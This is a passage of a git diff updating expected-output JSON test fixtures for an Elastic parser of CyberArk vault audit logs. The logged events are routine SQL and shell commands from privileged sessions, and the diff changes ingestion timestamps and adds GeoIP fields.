Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:54\",\"IsoTimestamp\":\"2021-03-25T14:56:54Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT INFO FROM SYSTEM.HELP WHERE UPPER(TOPIC) LIKE :1 ORDER BY TOPIC,SEQ (Parameters bound by position: 1\\\\=[HELP]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=800B;SrcHost=127.0.0.1;User=HR;VIDOffset=14T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", @@ -935,7 +935,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:58.683132100Z", + "ingested": "2021-12-14T14:42:26.430589006Z", "original": "\u003c5\u003e1 2021-03-25T14:58:02Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:58:02\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:58:02Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT * FROM DBA_USERS;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=1097B;SrcHost=127.0.0.1;User=HR;VIDOffset=82T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:58:02\",\"IsoTimestamp\":\"2021-03-25T14:58:02Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT * FROM DBA_USERS;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=1097B;SrcHost=127.0.0.1;User=HR;VIDOffset=82T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", @@ -1054,7 +1054,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:58.683136Z", + "ingested": "2021-12-14T14:42:26.430589395Z", "original": "\u003c5\u003e1 2021-03-25T14:57:05Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:57:05\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:57:05Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT INFO FROM SYSTEM.HELP WHERE UPPER(TOPIC) LIKE :1 ORDER BY TOPIC,SEQ (Parameters bound by position: 1\\\\=[SHOW%]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=948B;SrcHost=127.0.0.1;User=HR;VIDOffset=25T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:57:05\",\"IsoTimestamp\":\"2021-03-25T14:57:05Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT INFO FROM SYSTEM.HELP WHERE UPPER(TOPIC) LIKE :1 ORDER BY TOPIC,SEQ (Parameters bound by position: 1\\\\=[SHOW%]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=948B;SrcHost=127.0.0.1;User=HR;VIDOffset=25T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", @@ -1173,7 +1173,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:58.683141300Z", + "ingested": "2021-12-14T14:42:26.430589779Z", "original": "\u003c5\u003e1 2021-03-25T14:58:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:58:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:58:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=select distinct owner from all_objects;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=1153B;SrcHost=127.0.0.1;User=HR;VIDOffset=124T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:58:44\",\"IsoTimestamp\":\"2021-03-25T14:58:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=select distinct owner from all_objects;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=1153B;SrcHost=127.0.0.1;User=HR;VIDOffset=124T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log-expected.json index 28145839ab6..045f668a307 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-361-keystroke-logging.log-expected.json @@ -85,7 +85,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:00.165092Z", + "ingested": "2021-12-14T14:42:28.146626752Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eLinux\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.7\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=ls \\\"/var/tmp\\\";ConnectionComponentId=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=499852f2-22b5-11eb-8bff-000c297aae88;SrcHost=10.2.0.6;SSHOffset=3642B;User=admin2;VIDOffset=125T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"LINUX-SSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"admin2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"radiussrv.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMDisabled\\\" Value=\\\"No Reason\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"Tesla\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"361\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Linux\",\"File\":\"Root\\\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\",\"Station\":\"10.2.0.7\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=ls \\\"/var/tmp\\\";ConnectionComponentId=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=499852f2-22b5-11eb-8bff-000c297aae88;SrcHost=10.2.0.6;SSHOffset=3642B;User=admin2;VIDOffset=125T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"LINUX-SSH\"},{\"Name\":\"UserName\",\"Value\":\"admin2\"},{\"Name\":\"Address\",\"Value\":\"radiussrv.cyberark.local\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"},{\"Name\":\"CPMDisabled\",\"Value\":\"No Reason\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Customer\",\"Value\":\"Tesla\"}]}}}}", "code": "361", "kind": "event", @@ -108,17 +108,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ @@ -201,7 +219,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:00.165101100Z", + "ingested": "2021-12-14T14:42:28.146631066Z", "original": "\u003c5\u003e1 2021-03-14T13:49:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:49\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:49Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=10T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" 